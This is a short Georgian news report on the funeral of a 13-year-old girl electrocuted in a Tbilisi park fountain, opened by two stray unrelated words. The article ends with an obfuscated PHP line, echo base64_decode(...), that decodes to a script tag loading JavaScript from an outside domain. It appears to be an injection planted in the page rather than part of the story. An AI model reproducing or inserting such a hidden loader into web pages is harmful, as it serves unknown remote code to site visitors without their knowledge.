celsiusi
ავერსი შნაიდერი
მარიტა მეფარიშვილი, რომელიც 13 ოქტომბერს ვაკის პარკის შადრევანში, დენის დარტყმის შედეგად გარდაიცვალა, დაკრძალეს.  
 
13 წლის ჩოგბურთელი ბოლო გზაზე ოჯახის წევრებმა, მეგობრებმა და რიგითმა მოქალაქეებმა გააცილეს. სამოქალაქო პანაშვიდი ვაკის წმინდა სამების ეკლესიაში მიმდინარეობდა, შემდეგ კი ჩოგბურთის კორტებზე გადაასვენეს, საიდანაც ის უკვე ტაშით გააცილეს. 
 
დღეს სამოქალაქო პანაშვიდზე ოჯახს სამძიმარი გამოუცხადა პრეზიდენტმა, სალომე ზურაბიშვილმა, თბილისის მერმა კახა კალაძემ. პანაშვიდზე მისული იყვნენ პოლიტიკოსები როგორც ოპოზიციიდან, ისე ხელისუფლებიდან.
 
13 ოქტომბერს, დღის პირველ ნახევარში, თბილისში, ვაკის პარკის შადრევანში ჩავარდნილი ბურთის ამოსაღებად ჩასულ 3 ბავშვს დენმა დაარტყა, მათგან ერთი, 13 წლის მარიტა მეფარიშვილი, გარდაიცვალა.
358
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");